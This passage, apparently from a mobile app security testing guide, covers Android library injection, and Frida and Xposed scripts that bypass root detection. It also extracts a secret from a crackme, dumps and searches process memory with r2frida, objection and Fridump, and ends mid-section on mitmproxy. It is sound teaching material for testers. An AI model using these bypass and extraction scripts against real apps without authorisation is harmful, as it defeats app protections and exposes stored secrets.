Using library injection you can develop reusable libraries and inject them to different applications, effectively making them behave differently without having to modify their original source code. This is known as DLL injection on Windows (broadly used to modify and bypass anti-cheat mechanisms in games), LD_PRELOAD
on Linux and DYLD_INSERT_LIBRARIES
on macOS. On Android and iOS, a common example is using the Frida Gadget whenever Frida's so-called Injected mode of operation isn\u2019t suitable (i.e. you cannot run the Frida server on the target device). In this situation, you can inject the Gadget library by using the same methods you're going to learn in this section.
Library injection is desirable in many situations such as:
In this section, we will learn about techniques for performing library injection on Android, which basically consist of patching the application code (smali or native) or alternatively using the LD_PRELOAD
feature provided by the OS loader itself.
An Android application's decompiled smali code can be patched to introduce a call to System.loadLibrary
. The following smali patch injects a library named libinject.so:
const-string v0, \"inject\"\ninvoke-static {v0}, Ljava/lang/System;->loadLibrary(Ljava/lang/String;)V\n
Ideally you should insert the above code early in the application lifecycle, for instance in the onCreate
method. It is important to remember to add the library libinject.so in the respective architecture folder (armeabi-v7a, arm64-v8a, x86) of the lib
folder in the APK. Finally, you need to re-sign the application before using it.
A well-known use case of this technique is loading the Frida gadget to an application, especially while working on a non-rooted device (this is what objection patchapk
basically does).
Many Android applications use native code in addition to Java code for various performance and security reasons. The native code is present in the form of ELF shared libraries. An ELF executable includes a list of shared libraries (dependencies) that are linked to the executable for it to function optimally. This list can be modified to insert an additional library to be injected into the process.
Modifying the ELF file structure manually to inject a library can be cumbersome and prone to errors. However, this task can be performed with relative ease using LIEF (Library to Instrument Executable Formats). Using it requires only a few lines of Python code as shown below:
import lief\n\nlibnative = lief.parse(\"libnative.so\")\nlibnative.add_library(\"libinject.so\") # Injection!\nlibnative.write(\"libnative.so\")\n
In the above example, libinject.so library is injected as a dependency of a native library (libnative.so), which the application already loads by default. Frida gadget can be injected into an application using this approach as explained in detail in LIEF's documentation. As in the previous section, it is important to remember adding the library to the respective architecture lib
folder in the APK and finally re-signing the application.
Above we looked into techniques which require some kind of modification of the application's code. A library can also be injected into a process using functionalities offered by the loader of the operating system. On Android, which is a Linux based OS, you can load an additional library by setting the LD_PRELOAD
environment variable.
As the ld.so man page states, symbols loaded from the library passed using LD_PRELOAD
always get precedence, i.e. they are searched first by the loader while resolving the symbols, effectively overriding the original ones. This feature is often used to inspect the input parameters of some commonly used libc functions such as fopen
, read
, write
, strcmp
, etc., especially in obfuscated programs, where understanding their behavior may be challenging. Therefore, having an insight on which files are being opened or which strings are being compared may be very valuable. The key idea here is \"function wrapping\", meaning that you cannot patch system calls such as libc's fopen
, but you can override (wrap) it including custom code that will, for instance, print the input parameters for you and still call the original fopen
remaining transparent to the caller.
On Android, setting LD_PRELOAD
is slightly different compared to other Linux distributions. If you recall from the \"Platform Overview\" section, every application in Android is forked from Zygote, which is started very early during the Android boot-up. Thus, setting LD_PRELOAD
on Zygote is not possible. As a workaround for this problem, Android supports the setprop
(set property) functionality. Below you can see an example for an application with package name com.foo.bar
(note the additional wrap.
prefix):
setprop wrap.com.foo.bar LD_PRELOAD=/data/local/tmp/libpreload.so\n
Please note that if the library to be preloaded does not have SELinux context assigned, from Android 5.0 (API level 21) onwards, you need to disable SELinux to make LD_PRELOAD
work, which may require root.
You can use the command Java
in the Frida CLI to access the Java runtime and retrieve information from the running app. Remember that, unlike Frida for iOS, in Android you need to wrap your code inside a Java.perform
function. Thus, it's more convenient to use Frida scripts to e.g. get a list of loaded Java classes and their corresponding methods and fields or for more complex information gathering or instrumentation. One such script is listed below. The script used below to list a class's methods is available on GitHub.
// Get list of loaded Java classes and methods\n\n// Filename: java_class_listing.js\n\nJava.perform(function() {\n Java.enumerateLoadedClasses({\n onMatch: function(className) {\n console.log(className);\n describeJavaClass(className);\n },\n onComplete: function() {}\n });\n});\n\n// Get the methods and fields\nfunction describeJavaClass(className) {\n var jClass = Java.use(className);\n console.log(JSON.stringify({\n _name: className,\n _methods: Object.getOwnPropertyNames(jClass.__proto__).filter(function(m) {\n return !m.startsWith('$') // filter out Frida related special properties\n || m == 'class' || m == 'constructor' // optional\n }),\n _fields: jClass.class.getFields().map(function(f) {\n return( f.toString());\n })\n }, null, 2));\n}\n
After saving the script to a file called java_class_listing.js, you can tell Frida CLI to load it by using the flag -l
and inject it to the process ID specified by -p
.
frida -U -l java_class_listing.js -p <pid>\n\n// Output\n[Huawei Nexus 6P::sg.vantagepoint.helloworldjni]->\n...\n\ncom.scottyab.rootbeer.sample.MainActivity\n{\n \"_name\": \"com.scottyab.rootbeer.sample.MainActivity\",\n \"_methods\": [\n ...\n \"beerView\",\n \"checkRootImageViewList\",\n \"floatingActionButton\",\n \"infoDialog\",\n \"isRootedText\",\n \"isRootedTextDisclaimer\",\n \"mActivity\",\n \"GITHUB_LINK\"\n ],\n \"_fields\": [\n \"public static final int android.app.Activity.DEFAULT_KEYS_DIALER\",\n...\n
Given the verbosity of the output, the system classes can be filtered out programmatically to make output more readable and relevant to the use case.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0043/","title":"Method Hooking","text":""},{"location":"MASTG/techniques/android/MASTG-TECH-0043/#xposed","title":"Xposed","text":"Let's assume you're testing an app that's stubbornly quitting on your rooted device. You decompile the app and find the following highly suspect method:
package com.example.a.b\n\npublic static boolean c() {\n int v3 = 0;\n boolean v0 = false;\n\n String[] v1 = new String[]{\"/sbin/\", \"/system/bin/\", \"/system/xbin/\", \"/data/local/xbin/\",\n \"/data/local/bin/\", \"/system/sd/xbin/\", \"/system/bin/failsafe/\", \"/data/local/\"};\n\n int v2 = v1.length;\n\n for(int v3 = 0; v3 < v2; v3++) {\n if(new File(String.valueOf(v1[v3]) + \"su\").exists()) {\n v0 = true;\n return v0;\n }\n }\n\n return v0;\n}\n
This method iterates through a list of directories and returns true
(device rooted) if it finds the su
binary in any of them. Checks like this are easy to deactivate: all you have to do is replace the code with something that returns \"false\". Method hooking with an Xposed module is one way to do this (see \"Android Basic Security Testing\" for more details on Xposed installation and basics).
The method XposedHelpers.findAndHookMethod
allows you to override existing class methods. By inspecting the decompiled source code, you can find out that the method performing the check is c
. This method is located in the class com.example.a.b
. The following is an Xposed module that overrides the function so that it always returns false:
package com.awesome.pentestcompany;\n\nimport static de.robv.android.xposed.XposedHelpers.findAndHookMethod;\nimport de.robv.android.xposed.IXposedHookLoadPackage;\nimport de.robv.android.xposed.XposedBridge;\nimport de.robv.android.xposed.XC_MethodHook;\nimport de.robv.android.xposed.callbacks.XC_LoadPackage.LoadPackageParam;\n\npublic class DisableRootCheck implements IXposedHookLoadPackage {\n\n public void handleLoadPackage(final LoadPackageParam lpparam) throws Throwable {\n if (!lpparam.packageName.equals(\"com.example.targetapp\"))\n return;\n\n findAndHookMethod(\"com.example.a.b\", lpparam.classLoader, \"c\", new XC_MethodHook() {\n @Override\n\n protected void beforeHookedMethod(MethodHookParam param) throws Throwable {\n XposedBridge.log(\"Caught root check!\");\n param.setResult(false);\n }\n\n });\n }\n}\n
Just like regular Android apps, modules for Xposed are developed and deployed with Android Studio. For more details on writing, compiling, and installing Xposed modules, refer to the tutorial provided by its author, rovo89.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0043/#frida","title":"Frida","text":"We'll use Frida to solve the UnCrackable App for Android Level 1 and demonstrate how we can easily bypass root detection and extract secret data from the app.
When you start the crackme app on an emulator or a rooted device, you'll find that it presents a dialog box and exits as soon as you press \"OK\" because it detected root:
Let's see how we can prevent this.
The main method (decompiled with CFR) looks like this:
package sg.vantagepoint.uncrackable1;\n\nimport android.app.Activity;\nimport android.app.AlertDialog;\nimport android.content.Context;\nimport android.content.DialogInterface;\nimport android.os.Bundle;\nimport android.text.Editable;\nimport android.view.View;\nimport android.widget.EditText;\nimport sg.vantagepoint.a.b;\nimport sg.vantagepoint.a.c;\nimport sg.vantagepoint.uncrackable1.a;\n\npublic class MainActivity\nextends Activity {\n private void a(String string) {\n AlertDialog alertDialog = new AlertDialog.Builder((Context)this).create();\n alertDialog.setTitle((CharSequence)string);\n alertDialog.setMessage((CharSequence)\"This is unacceptable. The app is now going to exit.\");\n alertDialog.setButton(-3, (CharSequence)\"OK\", new DialogInterface.OnClickListener(){\n\n public void onClick(DialogInterface dialogInterface, int n) {\n System.exit((int)0);\n }\n });\n alertDialog.setCancelable(false);\n alertDialog.show();\n }\n\n protected void onCreate(Bundle bundle) {\n if (c.a() || c.b() || c.c()) {\n this.a(\"Root detected!\");\n }\n if (b.a(this.getApplicationContext())) {\n this.a(\"App is debuggable!\");\n }\n super.onCreate(bundle);\n this.setContentView(2130903040);\n }\n\n /*\n * Enabled aggressive block sorting\n */\n public void verify(View object) {\n object = ((EditText)this.findViewById(2130837505)).getText().toString();\n AlertDialog alertDialog = new AlertDialog.Builder((Context)this).create();\n if (a.a((String)object)) {\n alertDialog.setTitle((CharSequence)\"Success!\");\n object = \"This is the correct secret.\";\n } else {\n alertDialog.setTitle((CharSequence)\"Nope...\");\n object = \"That's not it. Try again.\";\n }\n alertDialog.setMessage((CharSequence)object);\n alertDialog.setButton(-3, (CharSequence)\"OK\", new DialogInterface.OnClickListener(){\n\n public void onClick(DialogInterface dialogInterface, int n) {\n dialogInterface.dismiss();\n }\n });\n alertDialog.show();\n }\n}\n
Notice the \"Root detected\" message in the onCreate
method and the various methods called in the preceding if
-statement (which perform the actual root checks). Also note the \"This is unacceptable...\" message from the first method of the class, private void a
. Obviously, this method displays the dialog box. There is an alertDialog.onClickListener
callback set in the setButton
method call, which closes the application via System.exit
after successful root detection. With Frida, you can prevent the app from exiting by hooking the MainActivity.a
method or the callback inside it. The example below shows how you can hook MainActivity.a
and prevent it from ending the application.
setImmediate(function() { //prevent timeout\n console.log(\"[*] Starting script\");\n\n Java.perform(function() {\n var mainActivity = Java.use(\"sg.vantagepoint.uncrackable1.MainActivity\");\n mainActivity.a.implementation = function(v) {\n console.log(\"[*] MainActivity.a called\");\n };\n console.log(\"[*] MainActivity.a modified\");\n\n });\n});\n
Wrap your code in the function setImmediate
to prevent timeouts (you may or may not need to do this), then call Java.perform
to use Frida's methods for dealing with Java. Afterwards retrieve a wrapper for MainActivity
class and overwrite its a
method. Unlike the original, the new version of a
just writes console output and doesn't exit the app. An alternative solution is to hook onClick
method of the OnClickListener
interface. You can overwrite the onClick
method and prevent it from ending the application with the System.exit
call. If you want to inject your own Frida script, it should either disable the AlertDialog
entirely or change the behavior of the onClick
method so the app does not exit when you click \"OK\".
Save the above script as uncrackable1.js
and load it:
frida -U -f owasp.mstg.uncrackable1 -l uncrackable1.js --no-pause\n
After you see the \"MainActivity.a modified\" message, the app will not exit anymore.
You can now try to input a \"secret string\". But where do you get it?
If you look at the class sg.vantagepoint.uncrackable1.a
, you can see the encrypted string with which your input gets compared:
package sg.vantagepoint.uncrackable1;\n\nimport android.util.Base64;\nimport android.util.Log;\n\npublic class a {\n public static boolean a(String string) {\n\n byte[] arrby = Base64.decode((String)\"5UJiFctbmgbDoLXmpL12mkno8HT4Lv8dlat8FxR2GOc=\", (int)0);\n\n try {\n arrby = sg.vantagepoint.a.a.a(a.b(\"8d127684cbc37c17616d806cf50473cc\"), arrby);\n }\n catch (Exception exception) {\n StringBuilder stringBuilder = new StringBuilder();\n stringBuilder.append(\"AES error:\");\n stringBuilder.append(exception.getMessage());\n Log.d((String)\"CodeCheck\", (String)stringBuilder.toString());\n arrby = new byte[]{};\n }\n return string.equals((Object)new String(arrby));\n }\n\n public static byte[] b(String string) {\n int n = string.length();\n byte[] arrby = new byte[n / 2];\n for (int i = 0; i < n; i += 2) {\n arrby[i / 2] = (byte)((Character.digit((char)string.charAt(i), (int)16) << 4) + Character.digit((char)string.charAt(i + 1), (int)16));\n }\n return arrby;\n }\n}\n
Look at the string.equals
comparison at the end of the a
method and the creation of the string arrby
in the try
block above. arrby
is the return value of the function sg.vantagepoint.a.a.a
. string.equals
comparison compares your input with arrby
. So we want the return value of sg.vantagepoint.a.a.a.
Instead of reversing the decryption routines to reconstruct the secret key, you can simply ignore all the decryption logic in the app and hook the sg.vantagepoint.a.a.a
function to catch its return value. Here is the complete script that prevents exiting on root and intercepts the decryption of the secret string:
setImmediate(function() { //prevent timeout\n console.log(\"[*] Starting script\");\n\n Java.perform(function() {\n var mainActivity = Java.use(\"sg.vantagepoint.uncrackable1.MainActivity\");\n mainActivity.a.implementation = function(v) {\n console.log(\"[*] MainActivity.a called\");\n };\n console.log(\"[*] MainActivity.a modified\");\n\n var aaClass = Java.use(\"sg.vantagepoint.a.a\");\n aaClass.a.implementation = function(arg1, arg2) {\n var retval = this.a(arg1, arg2);\n var password = '';\n for(var i = 0; i < retval.length; i++) {\n password += String.fromCharCode(retval[i]);\n }\n\n console.log(\"[*] Decrypted: \" + password);\n return retval;\n };\n console.log(\"[*] sg.vantagepoint.a.a.a modified\");\n });\n});\n
After running the script in Frida and seeing the \"[*] sg.vantagepoint.a.a.a modified\" message in the console, enter a random value for \"secret string\" and press verify. You should get an output similar to the following:
$ frida -U -f owasp.mstg.uncrackable1 -l uncrackable1.js --no-pause\n\n[*] Starting script\n[USB::Android Emulator 5554::sg.vantagepoint.uncrackable1]-> [*] MainActivity.a modified\n[*] sg.vantagepoint.a.a.a modified\n[*] MainActivity.a called.\n[*] Decrypted: I want to believe\n
The hooked function outputted the decrypted string. You extracted the secret string without having to dive too deep into the application code and its decryption routines.
You've now covered the basics of static/dynamic analysis on Android. Of course, the only way to really learn it is hands-on experience: build your own projects in Android Studio, observe how your code gets translated into bytecode and native code, and try to crack our challenges.
In the remaining sections, we'll introduce a few advanced subjects, including process exploration, kernel modules and dynamic execution.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0044/","title":"Process Exploration","text":"When testing an app, process exploration can provide the tester with deep insights into the app process memory. It can be achieved via runtime instrumentation and allows to perform tasks such as:
As you can see, these passive tasks help us collect information. This information is often used for other techniques, such as method hooking.
In the following sections you will be using r2frida to retrieve information straight from the app runtime. Please refer to r2frida's official installation instructions. First start by opening an r2frida session to the target app (e.g. HelloWorld JNI APK) that should be running on your Android phone (connected per USB). Use the following command:
r2 frida://usb//sg.vantagepoint.helloworldjni\n
See all options with r2 frida://?
.
Once in the r2frida session, all commands start with :
. For example, in radare2 you'd run i
to display the binary information, but in r2frida you'd use :i
.
You can retrieve the app's memory maps by running \\dm
. The output in Android can get very long (e.g. between 1500 and 2000 lines), to narrow your search and see only what directly belongs to the app apply a grep (~
) by package name \\dm~<package_name>
:
[0x00000000]> \\dm~sg.vantagepoint.helloworldjni\n0x000000009b2dc000 - 0x000000009b361000 rw- /dev/ashmem/dalvik-/data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.art (deleted)\n0x000000009b361000 - 0x000000009b36e000 --- /dev/ashmem/dalvik-/data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.art (deleted)\n0x000000009b36e000 - 0x000000009b371000 rw- /dev/ashmem/dalvik-/data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.art (deleted)\n0x0000007d103be000 - 0x0000007d10686000 r-- /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.vdex\n0x0000007d10dd0000 - 0x0000007d10dee000 r-- /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.odex\n0x0000007d10dee000 - 0x0000007d10e2b000 r-x /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.odex\n0x0000007d10e3a000 - 0x0000007d10e3b000 r-- /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.odex\n0x0000007d10e3b000 - 0x0000007d10e3c000 rw- /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.odex\n0x0000007d1c499000 - 0x0000007d1c49a000 r-x /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n0x0000007d1c4a9000 - 0x0000007d1c4aa000 r-- /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n0x0000007d1c4aa000 - 0x0000007d1c4ab000 rw- /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n0x0000007d1c516000 - 0x0000007d1c54d000 r-- /data/app/sg.vantagepoint.helloworldjni-1/base.apk\n0x0000007dbd23c000 - 0x0000007dbd247000 r-- /data/app/sg.vantagepoint.helloworldjni-1/base.apk\n0x0000007dc05db000 - 0x0000007dc05dc000 r-- /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.art\n
While you're searching or exploring the app memory, you can always verify where you're located at each moment (where your current offset is located) in the memory map. Instead of noting and searching for the memory address in this list you can simply run \\dm.
. You'll find an example in the following section \"In-Memory Search\".
If you're only interested in the modules (binaries and libraries) that the app has loaded, you can use the command \\il
to list them all:
[0x00000000]> \\il\n0x000000558b1fd000 app_process64\n0x0000007dbc859000 libandroid_runtime.so\n0x0000007dbf5d7000 libbinder.so\n0x0000007dbff4d000 libcutils.so\n0x0000007dbfd13000 libhwbinder.so\n0x0000007dbea00000 liblog.so\n0x0000007dbcf17000 libnativeloader.so\n0x0000007dbf21c000 libutils.so\n0x0000007dbde4b000 libc++.so\n0x0000007dbe09b000 libc.so\n...\n0x0000007d10dd0000 base.odex\n0x0000007d1c499000 libnative-lib.so\n0x0000007d2354e000 frida-agent-64.so\n0x0000007dc065d000 linux-vdso.so.1\n0x0000007dc065f000 linker64\n
As you might expect you can correlate the addresses of the libraries with the memory maps: e.g. the native library of the app is located at 0x0000007d1c499000
and optimized dex (base.odex) at 0x0000007d10dd0000
.
You can also use objection to display the same information.
$ objection --gadget sg.vantagepoint.helloworldjni explore\n\nsg.vantagepoint.helloworldjni on (google: 8.1.0) [usb] # memory list modules\nSave the output by adding `--json modules.json` to this command\n\nName Base Size Path\n----------------------------------------------- ------------ -------------------- --------------------------------------------------------------------\napp_process64 0x558b1fd000 32768 (32.0 KiB) /system/bin/app_process64\nlibandroid_runtime.so 0x7dbc859000 1982464 (1.9 MiB) /system/lib64/libandroid_runtime.so\nlibbinder.so 0x7dbf5d7000 557056 (544.0 KiB) /system/lib64/libbinder.so\nlibcutils.so 0x7dbff4d000 77824 (76.0 KiB) /system/lib64/libcutils.so\nlibhwbinder.so 0x7dbfd13000 163840 (160.0 KiB) /system/lib64/libhwbinder.so\nbase.odex 0x7d10dd0000 442368 (432.0 KiB) /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.odex\nlibnative-lib.so 0x7d1c499000 73728 (72.0 KiB) /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n
You can even directly see the size and the path to that binary in the Android file system.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0044/#in-memory-search","title":"In-Memory Search","text":"In-memory search is a very useful technique to test for sensitive data that might be present in the app memory.
See r2frida's help on the search command (\\/?
) to learn about the search command and get a list of options. The following shows only a subset of them:
[0x00000000]> \\/?\n / search\n /j search json\n /w search wide\n /wj search wide json\n /x search hex\n /xj search hex json\n...\n
You can adjust your search by using the search settings \\e~search
. For example, \\e search.quiet=true;
will print only the results and hide search progress:
[0x00000000]> \\e~search\ne search.in=perm:r--\ne search.quiet=false\n
For now, we'll continue with the defaults and concentrate on string search. This app is actually very simple, it loads the string \"Hello from C++\" from its native library and displays it to us. You can start by searching for \"Hello\" and see what r2frida finds:
[0x00000000]> \\/ Hello\nSearching 5 bytes: 48 65 6c 6c 6f\n...\nhits: 11\n0x13125398 hit0_0 HelloWorldJNI\n0x13126b90 hit0_1 Hello World!\n0x1312e220 hit0_2 Hello from C++\n0x70654ec5 hit0_3 Hello\n0x7d1c499560 hit0_4 Hello from C++\n0x7d1c4a9560 hit0_5 Hello from C++\n0x7d1c51cef9 hit0_6 HelloWorldJNI\n0x7d30ba11bc hit0_7 Hello World!\n0x7d39cd796b hit0_8 Hello.java\n0x7d39d2024d hit0_9 Hello;\n0x7d3aa4d274 hit0_10 Hello\n
Now you'd like to know where these addresses actually are. You may do so by running the \\dm.
command for all @@
hits matching the glob hit0_*
:
[0x00000000]> \\dm.@@ hit0_*\n0x0000000013100000 - 0x0000000013140000 rw- /dev/ashmem/dalvik-main space (region space) (deleted)\n0x0000000013100000 - 0x0000000013140000 rw- /dev/ashmem/dalvik-main space (region space) (deleted)\n0x0000000013100000 - 0x0000000013140000 rw- /dev/ashmem/dalvik-main space (region space) (deleted)\n0x00000000703c2000 - 0x00000000709b5000 rw- /data/dalvik-cache/arm64/system@framework@boot-framework.art\n0x0000007d1c499000 - 0x0000007d1c49a000 r-x /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n0x0000007d1c4a9000 - 0x0000007d1c4aa000 r-- /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n0x0000007d1c516000 - 0x0000007d1c54d000 r-- /data/app/sg.vantagepoint.helloworldjni-1/base.apk\n0x0000007d30a00000 - 0x0000007d30c00000 rw-\n0x0000007d396bc000 - 0x0000007d3a998000 r-- /system/framework/arm64/boot-framework.vdex\n0x0000007d396bc000 - 0x0000007d3a998000 r-- /system/framework/arm64/boot-framework.vdex\n0x0000007d3a998000 - 0x0000007d3aa9c000 r-- /system/framework/arm64/boot-ext.vdex\n
Additionally, you can search for occurrences of the wide version of the string (\\/w
) and, again, check their memory regions:
[0x00000000]> \\/w Hello\nSearching 10 bytes: 48 00 65 00 6c 00 6c 00 6f 00\nhits: 6\n0x13102acc hit1_0 480065006c006c006f00\n0x13102b9c hit1_1 480065006c006c006f00\n0x7d30a53aa0 hit1_2 480065006c006c006f00\n0x7d30a872b0 hit1_3 480065006c006c006f00\n0x7d30bb9568 hit1_4 480065006c006c006f00\n0x7d30bb9a68 hit1_5 480065006c006c006f00\n\n[0x00000000]> \\dm.@@ hit1_*\n0x0000000013100000 - 0x0000000013140000 rw- /dev/ashmem/dalvik-main space (region space) (deleted)\n0x0000000013100000 - 0x0000000013140000 rw- /dev/ashmem/dalvik-main space (region space) (deleted)\n0x0000007d30a00000 - 0x0000007d30c00000 rw-\n0x0000007d30a00000 - 0x0000007d30c00000 rw-\n0x0000007d30a00000 - 0x0000007d30c00000 rw-\n0x0000007d30a00000 - 0x0000007d30c00000 rw-\n
They are in the same rw- region as one of the previous strings (0x0000007d30a00000
). Note that searching for the wide versions of strings is sometimes the only way to find them as you'll see in the following section.
In-memory search can be very useful to quickly know if certain data is located in the main app binary, inside a shared library or in another region. You may also use it to test the behavior of the app regarding how the data is kept in memory. For instance, you could analyze an app that performs a login and search for occurrences of the user password. Also, you may check if you still can find the password in memory after the login is completed to verify if this sensitive data is wiped from memory after its use.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0044/#memory-dump","title":"Memory Dump","text":"You can dump the app's process memory with objection and Fridump. To take advantage of these tools on a non-rooted device, the Android app must be repackaged with frida-gadget.so
and re-signed. A detailed explanation of this process is in the section Dynamic Analysis on Non-Rooted Devices. To use these tools on a rooted phone, simply have frida-server installed and running.
Note: When using these tools, you might get several memory access violation errors which can normally be ignored. These tools inject a Frida agent and try to dump all the mapped memory of the app regardless of the access permissions (read/write/execute). Therefore, when the injected Frida agent tries to read a region that's not readable, it'll return the corresponding memory access violation errors. Refer to previous section \"Memory Maps and Inspection\" for more details.
With objection it is possible to dump all memory of the running process on the device by using the command memory dump all
.
$ objection --gadget sg.vantagepoint.helloworldjni explore\n\nsg.vantagepoint.helloworldjni on (google: 8.1.0) [usb] # memory dump all /Users/foo/memory_Android/memory\n\nWill dump 719 rw- images, totalling 1.6 GiB\nDumping 1002.8 MiB from base: 0x14140000 [------------------------------------] 0% 00:11:03(session detach message) process-terminated\nDumping 8.0 MiB from base: 0x7fc753e000 [####################################] 100%\nMemory dumped to file: /Users/foo/memory_Android/memory\n
In this case there was an error, which is probably due to memory access violations as we already anticipated. This error can be safely ignored as long as we are able to see the extracted dump in the file system. If you have any problems, a first step would be to enable the debug flag -d
when running objection or, if that doesn't help, file an issue in objection's GitHub.
Next, we are able to find the \"Hello from C++\" strings with radare2:
$ r2 /Users/foo/memory_Android/memory\n[0x00000000]> izz~Hello from\n1136 0x00065270 0x00065270 14 15 () ascii Hello from C++\n
Alternatively, you can use Fridump. This time, we will input a string and see if we can find it in the memory dump. For this, open the MASTG Hacking Playground app, navigate to \"OMTG_DATAST_002_LOGGING\" and enter \"owasp-mstg\" into the password field. Next, run Fridump:
python3 fridump.py -U sg.vp.owasp_mobile.omtg_android -s\n\nCurrent Directory: /Users/foo/git/fridump\nOutput directory is set to: /Users/foo/git/fridump/dump\nStarting Memory dump...\nOops, memory access violation!-------------------------------] 0.28% Complete\nProgress: [##################################################] 99.58% Complete\nRunning strings on all files:\nProgress: [##################################################] 100.0% Complete\n\nFinished!\n
Tip: Enable verbosity by including the flag -v
if you want to see more details, e.g. the regions provoking memory access violations.
It will take a while until it's completed and you'll get a collection of *.data files inside the dump folder. When you add the -s
flag, all strings are extracted from the dumped raw memory files and added to the file strings.txt
, which is also stored in the dump directory.
ls dump/\ndump/1007943680_dump.data dump/357826560_dump.data dump/630456320_dump.data ... strings.txt\n
Finally, search for the input string in the dump directory:
$ grep -nri owasp-mstg dump/\nBinary file dump//316669952_dump.data matches\nBinary file dump//strings.txt matches\n
The \"owasp-mstg\" string can be found in one of the dump files as well as in the processed strings file.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0045/","title":"Runtime Reverse Engineering","text":"Runtime reverse engineering can be seen as the on-the-fly version of reverse engineering where you don't have the binary data to your host computer. Instead, you'll analyze it straight from the memory of the app.
We'll keep using the HelloWorld JNI app, open a session with r2frida r2 frida://usb//sg.vantagepoint.helloworldjni
and you can start by displaying the target binary information by using the :i
command:
[0x00000000]> :i\narch arm\nbits 64\nos linux\npid 13215\nuid 10096\nobjc false\nruntime V8\njava true\ncylang false\npageSize 4096\npointerSize 8\ncodeSigningPolicy optional\nisDebuggerAttached false\ncwd /\ndataDir /data/user/0/sg.vantagepoint.helloworldjni\ncodeCacheDir /data/user/0/sg.vantagepoint.helloworldjni/code_cache\nextCacheDir /storage/emulated/0/Android/data/sg.vantagepoint.helloworldjni/cache\nobbDir /storage/emulated/0/Android/obb/sg.vantagepoint.helloworldjni\nfilesDir /data/user/0/sg.vantagepoint.helloworldjni/files\nnoBackupDir /data/user/0/sg.vantagepoint.helloworldjni/no_backup\ncodePath /data/app/sg.vantagepoint.helloworldjni-1/base.apk\npackageName sg.vantagepoint.helloworldjni\nandroidId c92f43af46f5578d\ncacheDir /data/local/tmp\njniEnv 0x7d30a43c60\n
Search all symbols of a certain module with :is <lib>
, e.g. :is libnative-lib.so
.
[0x00000000]> \\is libnative-lib.so\n\n[0x00000000]>\n
Which are empty in this case. Alternatively, you might prefer to look into the imports/exports. For example, list the imports with :ii <lib>
:
[0x00000000]> :ii libnative-lib.so\n0x7dbe1159d0 f __cxa_finalize /system/lib64/libc.so\n0x7dbe115868 f __cxa_atexit /system/lib64/libc.so\n
And list the exports with :iE <lib>
:
[0x00000000]> :iE libnative-lib.so\n0x7d1c49954c f Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI\n
For big binaries it's recommended to pipe the output to the internal less program by appending ~..
, i.e. \\ii libandroid_runtime.so~..
(if not, for this binary, you'd get almost 2500 lines printed to your terminal).
The next thing you might want to look at are the currently loaded Java classes:
[0x00000000]> \\ic~sg.vantagepoint.helloworldjni\nsg.vantagepoint.helloworldjni.MainActivity\n
List class fields:
[0x00000000]> :ic sg.vantagepoint.helloworldjni.MainActivity~sg.vantagepoint.helloworldjni\npublic native java.lang.String sg.vantagepoint.helloworldjni.MainActivity.stringFromJNI()\npublic sg.vantagepoint.helloworldjni.MainActivity()\n
Note that we've filtered by package name as this is the MainActivity
and it includes all methods from Android's Activity
class.
You can also display information about the class loader:
[0x00000000]> :icL\ndalvik.system.PathClassLoader[\n DexPathList[\n [\n directory \".\"]\n ,\n nativeLibraryDirectories=[\n /system/lib64,\n /vendor/lib64,\n /system/lib64,\n /vendor/lib64]\n ]\n ]\njava.lang.BootClassLoader@b1f1189dalvik.system.PathClassLoader[\n DexPathList[\n [\n zip file \"/data/app/sg.vantagepoint.helloworldjni-1/base.apk\"]\n ,\n nativeLibraryDirectories=[\n /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64,\n /data/app/sg.vantagepoint.helloworldjni-1/base.apk!/lib/arm64-v8a,\n /system/lib64,\n /vendor/lib64]\n ]\n ]\n
Next, imagine that you are interested into the method exported by libnative-lib.so 0x7d1c49954c f Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI
. You can seek to that address with s 0x7d1c49954c
, analyze that function af
and print 10 lines of its disassembly pd 10
:
[0x7d1c49954c]> pdf\n ;-- sym.fun.Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI:\n\u256d (fcn) fcn.7d1c49954c 18\n\u2502 fcn.7d1c49954c (int32_t arg_40f942h);\n\u2502 ; arg int32_t arg_40f942h @ x29+0x40f942\n\u2502 0x7d1c49954c 080040f9 ldr x8, [x0]\n\u2502 0x7d1c499550 01000090 adrp x1, 0x7d1c499000\n\u2502 0x7d1c499554 21801591 add x1, x1, 0x560 ; hit0_4\n\u2502 0x7d1c499558 029d42f9 ldr x2, [x8, 0x538] ; [0x538:4]=-1 ; 1336\n\u2502 0x7d1c49955c 4000 invalid\n
Note that the line tagged with ; hit0_4
corresponds to the string that we've previously found: 0x7d1c499560 hit0_4 Hello from C++
.
To learn more, please refer to the r2frida wiki.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0100/","title":"Logging Sensitive Data from Network Traffic","text":"mitmproxy can be used to intercept network traffic from Android apps. This technique is useful for identifying sensitive data that is sent over the network, as well as for identifying potential security vulnerabilities.
